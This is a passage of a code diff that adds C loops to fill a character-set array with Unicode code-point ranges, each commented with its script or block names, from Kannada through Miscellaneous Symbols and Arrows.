+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
